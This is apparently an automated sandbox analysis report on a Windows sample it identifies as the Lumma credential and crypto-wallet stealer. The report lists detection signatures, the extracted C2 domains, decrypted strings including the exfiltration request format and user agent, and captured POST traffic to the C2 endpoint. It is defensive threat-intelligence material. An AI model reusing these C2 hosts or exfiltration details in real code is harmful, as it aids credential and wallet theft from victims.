Windows Analysis Report
Lisect_AVT_24003_G1B_131.exe

Overview

General Information

Sample name: Lisect_AVT_24003_G1B_131.exe
Analysis ID: 1481247
MD5: a2860db7149c32113ae0e57f4b3ab327
SHA1: 6030980c88afc150475570118adb6fc5864ce27f
SHA256: e4e908772ae91c05f1f95ef06e1d70981db266c18717228da99d02df555b5725
Tags: exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Lisect_AVT_24003_G1B_131.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe" MD5: A2860DB7149C32113AE0E57F4B3AB327)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched
No Snort rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-25T06:32:22.783296+0200 | 2844041 | 49709 | 443 | TCP | Potentially Bad Traffic
2024-07-25T06:32:18.200098+0200 | 2028371 | 49707 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:17.529035+0200 | 2048094 | 49706 | 443 | TCP | Malware Command and Control Activity Detected
2024-07-25T06:32:15.786545+0200 | 2028371 | 49705 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:23.801097+0200 | 2028371 | 49710 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:17.095113+0200 | 2028371 | 49706 | 443 | TCP | Unknown Traffic
2024-07-25T06:33:09.496760+0200 | 2022930 | 443 | 49717 | TCP | A Network Trojan was detected
2024-07-25T06:32:16.198325+0200 | 2054653 | 49705 | 443 | TCP | A Network Trojan was detected
2024-07-25T06:32:31.135756+0200 | 2022930 | 443 | 49711 | TCP | A Network Trojan was detected
2024-07-25T06:32:14.809412+0200 | 2028371 | 49704 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:23.805727+0200 | 2843864 | 49710 | 443 | TCP | A Network Trojan was detected
2024-07-25T06:32:19.915054+0200 | 2028371 | 49708 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:22.373614+0200 | 2028371 | 49709 | 443 | TCP | Unknown Traffic
2024-07-25T06:32:14.245872+0200 | 2050741 | 64356 | 53 | UDP | Domain Observed Used for C2 Detected
2024-07-25T06:32:15.288502+0200 | 2054653 | 49704 | 443 | TCP | A Network Trojan was detected


              AV Detection

              Source: Lisect_AVT_24003_G1B_131.exeAvira: detected
              Source: https://resergvearyinitiani.shop/apiAvira URL Cloud: Label: malware
              Source: technologyenterdo.shopAvira URL Cloud: Label: malware
              Source: associationokeo.shopAvira URL Cloud: Label: malware
              Source: turkeyunlikelyofw.shopAvira URL Cloud: Label: malware
              Source: detectordiscusser.shopAvira URL Cloud: Label: malware
              Source: 0.2.Lisect_AVT_24003_G1B_131.exe.aa0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}
              Source: Lisect_AVT_24003_G1B_131.exeReversingLabs: Detection: 50%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: associationokeo.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: turkeyunlikelyofw.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: pooreveningfuseor.pw
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: edurestunningcrackyow.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: detectordiscusser.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: problemregardybuiwo.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: lighterepisodeheighte.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: technologyenterdo.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: resergvearyinitiani.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: GhJLkO--seevpalpadin
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: number of queries: 1001

              Networking

              Source: Malware configuration extractorURLs: associationokeo.shop
              Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
              Source: Malware configuration extractorURLs: pooreveningfuseor.pw
              Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
              Source: Malware configuration extractorURLs: detectordiscusser.shop
              Source: Malware configuration extractorURLs: problemregardybuiwo.fun
              Source: Malware configuration extractorURLs: lighterepisodeheighte.fun
              Source: Malware configuration extractorURLs: technologyenterdo.shop
              Source: Malware configuration extractorURLs: resergvearyinitiani.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13687Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16230Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20574Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572993Host: resergvearyinitiani.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: resergvearyinitiani.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206913461.0000000000762000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207870757.0000000000763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/))
              Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apiK
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apiW
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095048923.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apik
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/f
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: section name: .&u&u
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Code function: 0_3_00752E68
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000000.2055216242.00000000013B7000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: %0n8OriginalFilename_VersionInfo_InfoItemWWW vs Lisect_AVT_24003_G1B_131.exe
Source: Lisect_AVT_24003_G1B_131.exe | Binary or memory string: %0n8OriginalFilename_VersionInfo_InfoItemWWW vs Lisect_AVT_24003_G1B_131.exe
Source: Lisect_AVT_24003_G1B_131.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000000.2055216242.00000000013B7000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: Select a slide to edit from the listWW;
Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109016329.00000000007E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Lisect_AVT_24003_G1B_131.exe | ReversingLabs: Detection: 50%
Source: Lisect_AVT_24003_G1B_131.exe | String found in binary or memory: B-HelpAssistantWWW
Source: Lisect_AVT_24003_G1B_131.exe | String found in binary or memory: Play a multimedia file/Stop the macro for the specified amount of timeWWW,Get count of child windows of a named regionWW#Speak the contents of the clipboardWWW
Source: Lisect_AVT_24003_G1B_131.exe | String found in binary or memory: Play a multimedia file/Stop the macro for the specified amount of timeWWW,Get count of child windows of a named regionWW#Speak the contents of the clipboardWWW
